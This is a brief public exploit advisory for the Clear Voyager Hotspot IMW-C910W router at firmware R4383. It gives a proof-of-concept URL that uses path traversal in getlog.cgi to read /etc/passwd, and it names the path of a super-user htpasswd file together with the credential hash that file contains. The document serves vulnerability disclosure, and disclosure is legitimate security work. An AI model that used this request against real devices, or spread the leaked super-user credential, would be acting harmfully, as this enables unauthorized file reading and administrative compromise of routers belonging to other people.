Clear Voyager Hotspot IMW-C910W – Arbitrary File Disclosure

- # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
- vulnerable Device Software Version : R4383
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================